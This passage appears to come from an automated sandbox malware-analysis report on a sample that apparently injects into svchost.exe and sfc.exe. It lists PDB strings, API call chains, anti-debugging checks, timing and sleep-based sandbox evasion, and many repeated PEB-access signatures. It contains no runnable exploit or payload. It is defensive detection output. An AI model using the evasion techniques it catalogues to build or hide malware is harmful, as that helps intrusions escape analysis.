                Source: Binary string: wntdll.pdbUGP source: yloe82Jp1k.exe, 00000000.00000003.1196009386.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, yloe82Jp1k.exe, 00000000.00000003.1192344346.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1399882340.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1401695247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1496389029.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1496389029.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000009.00000003.1503765904.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3635502076.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000009.00000003.1496652505.0000000002C70000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3635502076.000000000317E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: yloe82Jp1k.exe, 00000000.00000003.1196009386.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, yloe82Jp1k.exe, 00000000.00000003.1192344346.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1399882340.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1401695247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1496389029.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1496389029.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, sfc.exe, 00000009.00000003.1503765904.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3635502076.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000009.00000003.1496652505.0000000002C70000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000009.00000002.3635502076.000000000317E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: svchost.exe, 00000001.00000003.1463563818.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1463665570.0000000003024000.00000004.00000020.00020000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 00000008.00000002.3634389149.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000001.00000003.1463563818.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1463665570.0000000003024000.00000004.00000020.00020000.00000000.sdmp, p6WXW8QjBjt0nco5J.exe, 00000008.00000002.3634389149.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: p6WXW8QjBjt0nco5J.exe, 00000008.00000000.1418644960.000000000063F000.00000002.00000001.01000000.00000007.sdmp, p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3633172478.000000000063F000.00000002.00000001.01000000.00000007.sdmp
                Source: yloe82Jp1k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: yloe82Jp1k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: yloe82Jp1k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: yloe82Jp1k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: yloe82Jp1k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007FC304 LoadLibraryA,GetProcAddress,0_2_007FC304
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_0078C590 push eax; retn 0078h0_2_0078C599
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A8B85 push ecx; ret 0_2_007A8B98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415048 push es; retf 1_2_00415049
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D89C pushfd ; ret 1_2_0040D89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004082CC push edi; ret 1_2_004082CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401A83 pushfd ; iretd 1_2_00401A84
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403440 push eax; ret 1_2_00403442
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411D54 push es; ret 1_2_00411D5F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D572 push cs; retf 1_2_0040D573
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AD15 push es; retf 1_2_0040AD1B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D5F4 push esp; retf 1_2_0040D603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411FD4 push esi; iretd 1_2_00411FEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411FE3 push esi; iretd 1_2_00411FEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177A3 push eax; iretd 1_2_004177A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370225F pushad ; ret 1_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037027FA pushad ; ret 1_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD push ecx; mov dword ptr [esp], ecx1_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370283D push eax; iretd 1_2_03702858
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_030109AD push ecx; mov dword ptr [esp], ecx9_2_030109B6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C6224 push eax; iretd 9_2_025C6258
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C52F8 push esp; ret 9_2_025C52FD
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C4360 push eax; iretd 9_2_025C4361
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C5559 push eax; ret 9_2_025C556A
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BEB91 push esi; iretd 9_2_025BEBAB
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BEBA0 push esi; iretd 9_2_025BEBAB
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025B78D2 push es; retf 9_2_025B78D8
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025BE911 push es; ret 9_2_025BE91C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025B4E89 push edi; ret 9_2_025B4E8A
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025C1C05 push es; retf 9_2_025C1C06
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DCF075 push ds; ret 9_2_02DCF1B2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_02DC5006 push 00000006h; iretd 9_2_02DC5002
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00784A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00784A35
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_008055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_008055FD
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007A33C7
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeAPI/Special instruction interceptor: Address: 1FB3234
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D324
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D7E4
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D944
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D504
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D544
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D1E4
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
                Source: C:\Windows\SysWOW64\sfc.exeWindow / User API: threadDelayed 1293Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeWindow / User API: threadDelayed 8680Jump to behavior
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeAPI coverage: 5.0 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\sfc.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\sfc.exe TID: 1984Thread sleep count: 1293 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exe TID: 1984Thread sleep time: -2586000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exe TID: 1984Thread sleep count: 8680 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exe TID: 1984Thread sleep time: -17360000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exe TID: 2536Thread sleep time: -85000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exe TID: 2536Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exe TID: 2536Thread sleep time: -43000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\NRXJLWHxGJnVyGSVOYtebCFPdjyZCaZICsQoNwSkOBOGlH\p6WXW8QjBjt0nco5J.exe TID: 2536Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007E4696
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EC93C FindFirstFileW,FindClose,0_2_007EC93C
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007EC9C7
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007EF200
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007EF35D
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007EF65E
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007E3A2B
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007E3D4E
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007EBF27
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 9_2_025CC9A0 FindFirstFileW,FindNextFileW,FindClose,9_2_025CC9A0
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00784AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00784AFE
                Source: p6WXW8QjBjt0nco5J.exe, 0000000A.00000002.3634097105.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: sfc.exe, 00000009.00000002.3633705117.0000000002A04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll##
                Source: firefox.exe, 0000000B.00000002.1794933882.00000290E20EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeAPI call chain: ExitProcess graph end nodegraph_0-98207
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeAPI call chain: ExitProcess graph end nodegraph_0-98279
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D23 LdrLoadDll,1_2_00417D23
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007F41FD BlockInput,0_2_007F41FD
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_00783B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00783B4C
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_007B5CCC
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_007FC304 LoadLibraryA,GetProcAddress,0_2_007FC304
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_01FB3500 mov eax, dword ptr fs:[00000030h]0_2_01FB3500
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_01FB34A0 mov eax, dword ptr fs:[00000030h]0_2_01FB34A0
                Source: C:\Users\user\Desktop\yloe82Jp1k.exeCode function: 0_2_01FB1E70 mov eax, dword ptr fs:[00000030h]0_2_01FB1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D437C mov eax, dword ptr fs:[00000030h]1_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov ecx, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA352 mov eax, dword ptr fs:[00000030h]1_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8350 mov ecx, dword ptr fs:[00000030h]1_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C310 mov ecx, dword ptr fs:[00000030h]1_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750310 mov ecx, dword ptr fs:[00000030h]1_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037663FF mov eax, dword ptr fs:[00000030h]1_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]1_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03808324 mov ecx, dword ptr fs:[00000030h]1_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]1_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]1_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov ecx, dword ptr fs:[00000030h]1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]1_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]1_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC3CD mov eax, dword ptr fs:[00000030h]1_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B63C0 mov eax, dword ptr fs:[00000030h]1_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380634F mov eax, dword ptr fs:[00000030h]1_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]1_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]1_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372826B mov eax, dword ptr fs:[00000030h]1_2_0372826B
